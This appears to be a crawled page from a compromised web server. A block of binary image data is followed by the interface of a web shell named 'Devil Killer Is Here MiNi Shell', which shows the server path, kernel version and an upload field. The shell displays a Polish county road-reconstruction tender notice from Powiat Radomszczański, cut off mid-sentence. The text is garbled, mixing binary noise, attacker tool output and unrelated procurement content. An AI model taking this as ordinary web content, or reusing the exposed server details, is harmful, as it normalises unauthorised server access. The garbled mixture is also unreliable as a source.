JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20230607/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20230607/0025112801-N-2023.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> Przebudowa odcinków dróg powiatowych nr 3923E, nr 3934E, nr 3931E </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Powiat Radomszczański</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 590648445</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Leszka Czarnego 22</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Radomsko</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">97-500</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">łódzkie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL713 - Piotrkowski</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">44 6858944</span></h3> <h3 class="mb-0">1.5.8.) Numer faksu: <span class="normal">44 6834335</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">przetargi@radomszczanski.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.radomszczanski.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Przebudowa odcinków dróg powiatowych nr 3923E, nr 3934E, nr 3931E </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-ff19f845-fed3-11ed-b70f-ae2d9e28ec7b</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2023/BZP 00251128</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2023-06-07</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2023/BZP 00024010/04/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.8 Przebudowa odcinków dróg powiatowych nr 3923E, nr 3934E, nr 3931E</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://platformazakupowa.pl/transakcja/772856 <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://platformazakupowa.pl/transakcja/772856</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1. Komunikacja w postępowaniu o udzielenie zamówienia w tym składanie ofert, wymiana informacji oraz przekazywanie dokumentów lub oświadczeń między Zamawiającym a Wykonawcą, z uwzględnieniem wyjątków określonych w ustawie odbywa się w języku polskim przy użyciu środków<br/>komunikacji elektronicznej za pośrednictwem platformy zakupowej https://platformazakupowa.pl pod adresem<br/>https://platformazakupowa.pl/transakcja/772856<br/>Korzystanie z platformy przez wykonawcę jest bezpłatne. Zamawiający dopuszcza opcjonalnie korzystanie z komunikacji<br/>elektronicznej za pośrednictwem poczty elektronicznej przetargi@radomszczanski.pl z zastrzeżeniem sposobu i formy składania<br/>oferty.<br/>2. Zamawiający informuje, że instrukcje korzystania z https://platformazakupowa.pl dotyczące w szczególności logowania, składania wniosków o wyjaśnienie treści SWZ, składania ofert oraz innych czynności podejmowanych w niniejszym postępowaniu przy użyciu<br/>https://platformazakupowa.pl znajdują się w zakładce „Instrukcje dla Wykonawców&#34; na stronie internetowej pod adresem:<br/>https://platformazakupowa.pl/strona/45-instrukcje<br/>3. Szczegółowe informacje dotyczące wymagań technicznych i organizacyjnych dotyczących korespondencji elektronicznej zawarto<br/>w rozdziale 8 SWZ dostępnej na stronie https://platformazakupowa.pl/transakcja/772856</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Informacja dotycząca RODO została szczegółowo określona w rozdziale 28 SWZ.</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">Informacja dotycząca RODO została szczegółowo określona w rozdziale 28 SWZ.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">WP.272.13.2023</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">2</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przebudowa drogi powiatowej nr 3923E ul. Powstańców Wielkopolskich w m. Kobiele Wielkie, Przebudowa drogi powiatowej nr 3934E w m. Łowicz<br/>Przedmiot zamówienia jest współfinansowany ze środków Rządowego Funduszu POLSKI ŁAD Program Inwestycji Strategicznych.<br/>1. Przedmiotem Części 1 zamówienia jest:<br/>1.1. Przebudowa drogi powiatowej nr 3923E ul. Powstańców Wielkopolskich w m. Kobiele Wielkie na odcinku od skrzyżowania ul. Zachodniej (droga gminna) i ul. Parkowej (droga powiatowa nr 3926E) do końca działki nr ewid. 23/32 obręb Kobiele Wielkie o długości 954 m<br/>Realizacja tej części przedmiotu zamówienia polega w szczególności na:<br/>- wykonaniu kompletnej dokumentacji projektowej,<br/>- uzyskaniu wynikających z przepisów opinii, uzgodnień i decyzji, w tym uzyskaniu pozwolenia wodnoprawnego,<br/>- uzyskaniu pozwolenia na budowę dla robót budowlanych dla których uzyskanie pozwolenia jest wymagane lub zgłoszenia robót niewymagających pozwolenia na budowę,<br/>- budowie ciągu pieszego w formie jednostronnego chodnika szerokości 2,0 m,<br/>- budowie i przebudowie zjazdów,<br/>- rozbiórce istniejących przepustów zlokalizowanych pod zjazdami – po stronie projektowanego chodnika oraz rozbiórce elementów układu drogowego,<br/>- wybudowaniu i uregulowaniu systemu odwodnienia drogi w postaci:<br/>a) szczelnego systemu kanalizacji deszczowej na odcinku ok. 750 m tj. od istniejącego rowu przydrożnego w km. od ok. 0+010 do km. 0+763 złożonego z kolektora głównego z rur strukturalnych PP SN8 (przewiduje się kanał w zakresie średnic Ø 250-400 mm, przekrój rury należy zweryfikować po wykonaniu obliczeń hydraulicznych na etapie wykonywania projektu budowlanego), studni rewizyjnych, studzienek wpustowych wraz z przykanalikami, <br/>b) umocnieniu wylotów i wlotu kanału za pomocą płyt ażurowych np. 60x40x8 cm układanych na podsypce cementowo – piaskowej,<br/>c) przebudowie przepustu okularowego zlokalizowanego w km.: ok. 0+303 pod drogą powiatową 3923E poprzez wydłużenie przepustu wraz utwardzeniem i zabudową wylotu monolityczną ścianą czołową oraz czyszczenie przepustu w celu zapewnienia jego drożności.<br/>- montażu bariery szczeblinkowej U-11a na zwieńczeniu ścianki czołowej przepustu okularowego,<br/>- usunięciu wszelkich kolizji z infrastrukturą techniczną,<br/>-regulacji wysokościowej elementów infrastruktury technicznej do poziomu projektowanych nawierzchni,<br/>- przygotowaniu dokumentów związanych z oddaniem obiektów do eksploatacji. <br/>Uwaga: W programie funkcjonalno – użytkowym (PFU) przewidziane zostało, iż Wykonawca uzyska w imieniu Zamawiającego zwolnienia z obowiązku budowy kanału technologicznego zgodnie z przepisami ustawy o drogach publicznych – ze względu na brak na przedmiotowym terenie kanalizacji kablowej, kanału technologicznego oraz linii światłowodowej posiadającej wolne zasoby do usług szerokopasmowych – a w przypadku odmowy wydania zwolnienia budowę kanału technologicznego chyba, że przepisy stanowią inaczej. Z uwagi na zmanię przepisów w zakresie budowy kanałów technologicznych, powyższy zakres prac nie będzie realizowany przez Wykonawcę, dlatego też Wykonawca jest zobowiązany nie uwzględniać w cenie oferty kosztów prac związanych z realizacją kanału technologicznego, jak również z koniecznością uzyskania zwolnienia. <br/><br/>1.2. Przebudowa drogi powiatowej nr 3934E w m. Łowicz na odcinku od skrzyżowania z drogą powiatową nr 3925E do skrzyżowania z drogą powiatową nr 3905E o długości 834 m<br/>Realizacja tej części przedmiotu zamówienia polega w szczególności na:<br/>- wykonaniu kompletnej dokumentacji projektowej,<br/>- uzyskaniu wynikających z przepisów opinii, uzgodnień i decyzji, w tym uzyskaniu pozwolenia wodnoprawnego,<br/>- uzyskaniu pozwolenia na budowę dla robót budowlanych dla których uzyskanie pozwolenia jest wymagane lub zgłoszenia robót niewymagających pozwolenia na budowę,<br/>- budowie ciągu pieszego w formie jednostronnego chodnika szerokości 2,0 m (z lokalnym przewężeniem w obrębie przeszkody terenowej – przepustu okularowego w km. ok. 0+021), <br/>- budowie i przebudowie zjazdów,<br/>- rozbiórce istniejących przepustów zlokalizowanych pod zjazdami – po stronie projektowanego chodnika oraz rozbiórka elementów układu drogowego,<br/>- wybudowaniu i uregulowaniu systemu odwodnienia drogi w postaci:<br/>a) szczelnego systemu kanalizacji deszczowej na odcinku ok. 286 m tj. od przepustu okularowego w km. od ok. 0+021 do km. 0+307 złożonego z kolektora głównego z rur strukturalnych PP SN8 (przewiduje się kanał w zakresie średnic Ø 250-400 mm, przekrój rury należy zweryfikować po wykonaniu obliczeń hydraulicznych na etapie wykonywania projektu budowlanego), studni rewizyjnych, studzienek wpustowych wraz z przykanalikami, <br/>b) drenażu liniowego (francuskiego) z włączeniem do istniejącego rowu przydrożnego zlokalizowanego po lewej stronie w kierunku miejscowości Kobiele Wielkie, wylot do rowu utwardzony, zakończony studnią wyposażoną w kratę,<br/>c) ścieku przykrawężnikowego po stronie projektowanego chodnika na odcinku 590 m od km: 0+000 do km: 0+590,<br/>d) przebudowy przepustu okularowego zlokalizowanego pod drogą powiatową nr 3934E poprzez wydłużenie przepustu wraz z utwardzeniem i zabudową wylotu monolityczną ścianą czołową,<br/>e) przebudowy przepustu zlokalizowanego na wlocie drogi powiatowej nr 3925E poprzez zabudowę wylotu studnią betonową z odcinkiem kanału Ø 400,<br/>- odtworzeniu istniejących rowów poprzez odmulenie z osadów,<br/>- umocnieniu płytami ażurowymi skarpy przylegającej do chodnika na odcinku od km. 0+000 do km. ok. 0+137,<br/>- montażu bariery szczeblinkowej U-11a na odcinku od km. 0+000 do km. ok. 0+128 tj. na odcinku umocnionej skarpy płytami ażurowymi (na odcinku w rejonie przepustu okularowego montaż barierek należy wykonać do projektowanej ścianki czołowej),<br/>- usunięciu wszelkich kolizji z infrastrukturą techniczną m.in. telekomunikacyjną linią kablową,<br/>- regulacji wysokościowej elementów infrastruktury technicznej do poziomu projektowanych nawierzchni,<br/>- przygotowaniu dokumentów związanych z oddaniem obiektów do eksploatacji.<br/>Uwaga: W programie funkcjonalno – użytkowym (PFU) przewidziane zostało, iż Wykonawca uzyska w imieniu Zamawiającego zwolnienia z obowiązku budowy kanału technologicznego zgodnie z przepisami ustawy o drogach publicznych – ze względu na brak na przedmiotowym terenie kanalizacji kablowej, kanału technologicznego oraz linii światłowodowej posiadającej wolne zasoby do usług szerokopasmowych – a w przypadku odmowy wydania zwolnienia budowę kanału technologicznego chyba, że przepisy stanowią inaczej. Z uwagi na zmanię przepisów w zakresie budowy kanałów technologicznych, powyższy zakres prac nie będzie realizowany przez Wykonawcę, dlatego też Wykonawca jest zobowiązany nie uwzględniać w cenie oferty kosztów prac związanych z realizacją kanału technologicznego, jak również z koniecznością uzyskania zwolnienia. <br/>2. Szczegółowy opis przedmiotu zamówienia, o którym mowa w pkt. 1 określa program funkcjonalno-użytkowy (zwany dalej PFU), stanowiący załącznik nr 8a do SWZ dla Części 1 zamówienia.<br/>Informacje dodatkowe:<br/>Roboty będą nadzorowane przez Inspektora Nadzoru.<br/>Działając w oparciu o treść art. 310 ustawy Pzp Zamawiający zastrzega możliwość unieważnienia postępowanie o udzielenie zamówienia, jeżeli środki publiczne, które Zamawiający zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia, nie zostały mu przyznane.<br/>W każdym przypadku użycia w PFU norm, ocen technicznych, specyfikacji technicznych i systemów referencji technicznych, o których mowa w art. 101 ust. 1 pkt 2 oraz ust. 3 ustawy Pzp Wykonawca powinien przyjąć, że odniesieniu takiemu towarzyszą wyrazy „lub równoważne”. W przypadku użycia w PFU odniesień do norm, europejskich ocen technicznych, aprobat, specyfikacji technicznych i systemów referencji technicznych Zamawiający dopuszcza rozwiązania równoważne opisywanym. Wykonawca analizując PFU powinien założyć, że każdemu odniesieniu użytemu w dokumentacji towarzyszy wyraz „lub równoważne&#34;. <br/>W przypadku, gdy w PFU zostały użyte znaki towarowe, oznacza to, że są podane przykładowo i określają jedynie minimalne oczekiwane parametry jakościowe oraz wymagany standard. Wykonawca może zastosować materiały lub urządzenia równoważne, lecz o parametrach technicznych i jakościowych podobnych lub lepszych, których zastosowanie w żaden sposób nie wpłynie negatywnie na prawidłowe funkcjonowanie rozwiązań przyjętych w PFU. Wykonawca, który zastosuje urządzenia lub materiały równoważne będzie obowiązany wykazać na etapie realizacji zamówienia, że zastosowane przez niego urządzenia i materiały spełniają wymagania określone przez Zamawiającego. <br/>Zamawiający wskazuje, że obowiązek zgłoszenia w ofercie rozwiązań równoważnych w stosunku do opisanych w opisie przedmiotu zamówienia i wykazania równoważności leży po stronie Wykonawcy. <br/>W przypadku gdy wymagania w opisie przedmiotu zamówienia odnoszą się do norm, europejskich ocen technicznych, specyfikacji technicznych, systemów referencji technicznych, o których mowa w art. 101 ust. 1 pkt 2 i ust. 3 Pzp, Zamawiający wymaga, aby Wykonawca przedstawił już w jego ofercie dowody równoważności w sposób określony w art. 101 ust. 5 i 6 Pzp.<br/>Wymagania jakościowe w związku z zastosowaniem kryterium ceny jako kryterium o wadze przekraczającej 60% odnoszące się do co najmniej głównych elementów składających się na przedmiot zamówienia, zostały określone w programie funkcjonalno-użytkowym i projekcie umowy.<br/>C.d. w Sekcji IX Pozostałe informacje. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45233120-6 - Roboty w zakresie budowy dróg</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45231000-5 - Roboty budowlane w zakresie budowy rurociągów, ciągów komunikacyjnych i linii energetycznych</p> <p class="mb-0">71320000-7 - Usługi inżynieryjne w zakresie projektowania</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">18 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Przy dokonywaniu wyboru najkorzystniejszej oferty Zamawiający stosować będzie kryterium oceny ofert jakim jest Cena (C) – 100%.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Część 2 zamówienia - Przebudowa drogi powiatowej nr 3931E ul. Mickiewicza w m. Gorzędów.<br/>Przedmiot zamówienia jest współfinansowany ze środków Rządowego Funduszu POLSKI ŁAD Program Inwestycji Strategicznych.<br/>1. Roboty stanowiące przedmiot zamówienia obejmują przebudowę drogi powiatowej nr 3931E ul. Mickiewicza w m. Gorzędów na odcinku od skrzyżowania z ul. Chopina do końca działki nr ewid. 944 obręb Gorzędów o długości 671 m<br/>Realizacja tej części przedmiotu zamówienia polega w szczególności na:<br/>- wykonaniu kompletnej dokumentacji projektowej,<br/>- uzyskaniu wynikających z przepisów opinii, uzgodnień i decyzji, w tym uzyskaniu pozwolenia wodnoprawnego,<br/>- uzyskaniu pozwolenia na budowę dla robót budowlanych dla których uzyskanie pozwolenia <br/> jest wymagane lub zgłoszenia robót niewymagających pozwolenia na budowę,<br/>- przebudowaniu części jezdni drogi powiatowej w zakresie poszerzenia jezdni do szerokości <br/> 6,0 m oraz budowy ciągu pieszego w formie chodnika szerokości 2,0 m wraz z przejściem dla <br/> pieszych szerokości 4,0 m,<br/>- budowie i przebudowie zjazdów,<br/>- rozbiórce elementów układu drogowego,<br/>- wybudowaniu i uregulowaniu systemu odwodnienia drogi w postaci:<br/>a) wpustów ulicznych w ilości ok. 10 szt. zlokalizowanych po stronie projektowanego <br/> chodnika, <br/>b) ścieku przykrawężnikowego po stronie projektowanego chodnika na odcinku 60 m od km: <br/> 0+140 do km: 0+200, <br/>c) drenażu liniowego dł. ok 300,0 m z systemem studni rewizyjnych w ilości ok. 9 szt., <br/>- przebudowaniu istniejącego przepustu zlokalizowanego pod drogą powiatową nr 3931E w km. ok 0+667,70 poprzez zabudowę wylotu (usytuowanego po stronie prawej) studnią betonową oraz odcinkiem kanału min. Ø 400 z umocnionym wylotem do ist. rowu,<br/>- rozbiórce istniejącego przepustu zlokalizowanego pod jezdnią na wlocie ul. Polnej (w miejscu przepustu objętego rozbiórką zaplanowano budowę odcinka systemu odwodnienia złożonego z kanału rurowego studni rewizyjnych oraz drenażu),<br/>- odtworzeniu istniejących rowów poprzez odmulenie z osadów,<br/>- usunięciu wszelkich kolizji z infrastrukturą techniczną m.in. z napowietrzną linią teletechniczną,<br/>- regulacji wysokościowej elementów infrastruktury technicznej do poziomu projektowanych nawierzchni,<br/>- przygotowaniu dokumentów związanych z oddaniem obiektów do eksploatacji. <br/>Uwaga: W programie funkcjonalno – użytkowym (PFU) przewidziane zostało, iż Wykonawca uzyska w imieniu Zamawiającego zwolnienia z obowiązku budowy kanału technologicznego zgodnie z przepisami ustawy o drogach publicznych – ze względu na brak na przedmiotowym terenie kanalizacji kablowej, kanału technologicznego oraz linii światłowodowej posiadającej wolne zasoby do usług szerokopasmowych – a w przypadku odmowy wydania zwolnienia budowę kanału technologicznego chyba, że przepisy stanowią inaczej. Z uwagi na zmanię przepisów w zakresie budowy kanałów technologicznych, powyższy zakres prac nie będzie realizowany przez Wykonawcę, dlatego też Wykonawca jest zobowiązany nie uwzględniać w cenie oferty kosztów prac związanych z realizacją kanału technologicznego, jak również z koniecznością uzyskania zwolnienia. <br/>2. Szczegółowy opis przedmiotu zamówienia, o którym mowa w pkt. 1 określa program funkcjonalno-użytkowy (zwany dalej PFU), stanowiący załącznik nr 8b do SWZ dla Części 2 zamówienia.<br/>Informacje dodatkowe :<br/>Roboty będą nadzorowane przez Inspektora Nadzoru.<br/>Działając w oparciu o treść art. 310 ustawy Pzp Zamawiający zastrzega możliwość unieważnienia postępowanie o udzielenie zamówienia, jeżeli środki publiczne, które Zamawiający zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia, nie zostały mu przyznane.<br/>W każdym przypadku użycia w PFU norm, ocen technicznych, specyfikacji technicznych i systemów referencji technicznych, o których mowa w art. 101 ust. 1 pkt 2 oraz ust. 3 ustawy Pzp Wykonawca powinien przyjąć, że odniesieniu takiemu towarzyszą wyrazy „lub równoważne”. W przypadku użycia w PFU odniesień do norm, europejskich ocen technicznych, aprobat, specyfikacji technicznych i systemów referencji technicznych Zamawiający dopuszcza rozwiązania równoważne opisywanym. Wykonawca analizując PFU powinien założyć, że każdemu odniesieniu użytemu w dokumentacji towarzyszy wyraz „lub równoważne&#34;. <br/>W przypadku, gdy w PFU zostały użyte znaki towarowe, oznacza to, że są podane przykładowo i określają jedynie minimalne oczekiwane parametry jakościowe oraz wymagany standard. Wykonawca może zastosować materiały lub urządzenia równoważne, lecz o parametrach technicznych i jakościowych podobnych 